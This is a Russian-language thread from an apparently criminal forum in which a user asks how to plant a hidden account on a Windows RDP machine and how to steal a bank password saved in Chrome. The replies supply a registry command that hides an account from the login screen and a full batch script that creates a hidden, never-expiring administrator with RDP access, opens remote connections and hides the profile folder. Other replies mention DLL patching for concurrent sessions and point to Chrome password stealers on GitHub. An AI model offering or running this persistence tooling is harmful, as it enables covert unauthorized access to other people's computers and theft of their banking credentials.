RDP

google_ · 20.01.2025

Доброго времени суток, есть такой вопрос, как на RDP windows создать скрытую учетную запись?
и какой кейлоггер лучше использовать что бы узнать пароль от банка в гугл хром
спасибо за ответ
Заранее извините, если cоздал тему не в том разделе.

InCrease · 20.01.2025

google_ сказал(а):

Доброго времени суток, есть такой вопрос, как на RDP windows создать скрытую учетную запись?

В RDP используются учетные записи самой ОС Windows, скрытых там нем (разве что в домен машину ввести).
Максимум неприметную можно создать, похожую на системные.

google_ сказал(а):

и какой кейлоггер лучше использовать что бы узнать пароль от банка в гугл хром

Любой хороший стилер тянет пароли от Хрома, даже на Гитхабе есть рабочие решения с исходниками.
Вот только...
0) Чтобы достать инфу из Хрома нужно работать от имени учетной записи того юзера, чьи пароли. Т.е. нужно либо знать, либо сбросить его пароль.
1) Вряд ли в банк вход по паролю, скорее всего там два фактора авторизации. Нужно еще смс скорее всего или что-то типа.
2) Чужие пароли от банков лучше вообще не узнавать.

swwwheart · 20.01.2025

google_ сказал(а):

Доброго времени суток, есть такой вопрос, как на RDP windows создать скрытую учетную запись?
и какой кейлоггер лучше использовать что бы узнать пароль от банка в гугл хром
спасибо за ответ
Заранее извините, если cоздал тему не в том разделе.

you need to patch teamsrv.dll to be able to have multiple rdp sessions without disrupting users, new users can be hidden on logon via the registry. This all requires admin privileges.

Guest · 21.01.2025

google_ сказал(а):

Доброго времени суток, есть такой вопрос, как на RDP windows создать скрытую учетную запись?
и какой кейлоггер лучше использовать что бы узнать пароль от банка в гугл хром
спасибо за ответ
Заранее извините, если cоздал тему не в том разделе.

This command will make the user account on the machine hidden from the login screen, which obviously requires administrative privileges.

reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /f /d 0 /v username

google_ · 21.01.2025

swwwheart сказал(а):

you need to patch teamsrv.dll to be able to have multiple rdp sessions without disrupting users, new users can be hidden on logon via the registry. This all requires admin privileges.

Guest сказал(а):

This command will make the user account on the machine hidden from the login screen, which obviously requires administrative privileges.
reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /f /d 0 /v username

I have administrative privileges
thank you for your reply

CometaData · 22.01.2025

Нашел батник для создания учетки и скрития папок учетки.
В начале кода установи логин и пароль свой.

У вас должно быть более 1 реакций для просмотра скрытого контента.

Код:

@echo off
set user=Admin
set pass=passw00rd

set AdmGroupSID=S-1-5-32-544
set AdmGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%AdmGroupSID%'" Get Name /Value ^| Find "="`) Do set AdmGroup=%%J
set AdmGroup=%AdmGroup:~0,-1%
net user %user% %pass% /add /active:"yes" /expires:"never" /passwordchg:"NO"
net localgroup %AdmGroup% %user% /add
set RDPGroupSID=S-1-5-32-555
set RDPGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%RDPGroupSID%'" Get Name /Value ^| Find "="`) Do set RDPGroup=%%J
set RDPGroup=%RDPGroup:~0,-1%
net localgroup "%RDPGroup%" %user% /add
net accounts /forcelogoff:no /maxpwage:unlimited
reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxConnectionTime" /t REG_DWORD /d 0x1 /f
reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxDisconnectionTime" /t REG_DWORD /d 0x0 /f
reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxIdleTime" /t REG_DWORD /d 0x0 /f
reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v %user% /t REG_DWORD /d 0x0 /f

if not exist %systemdrive%\users\%user% mkdir %systemdrive%\users\%user%
attrib  +R +A +S +H %systemdrive%\users\%user%

google_ · 22.01.2025

CometaData сказал(а):

Нашел батник для создания учетки и скрития папок учетки.
В начале кода установи логин и пароль свой.
Скрытое содержимое

Cпасибо тебе, буду тестить

CometaData · 23.01.2025

google_ сказал(а):

Cпасибо тебе, буду тестить

Антивирус на етот батник ругается почемуто )))
В строках нет ничего вирусного

WhiteDragon · 23.01.2025

CometaData сказал(а):

Антивирус на етот батник ругается почемуто )))
В строках нет ничего вирусного

действительно
Просто создал учетку , добавил в админ группу, добвил в группу рдп (хотя может кампания сидит через тимвьюв), активизировал юзера, полазил в фареволе, открыл порты для подключения любого типа. Ну да, ничего не обычного, дефолтный рабочий день у 50 летней бухгалтерши Джессики на западном Иллиойсе, которая в понедельник 7 утра запускает батник через conhost.exe.

RDP

google_

(L3) cache

InCrease

RAID-массив

swwwheart

Its nice to be nice

Guest

Премиум

google_

(L3) cache

CometaData

CD-диск

google_

(L3) cache

CometaData

CD-диск

WhiteDragon

AMSI bypass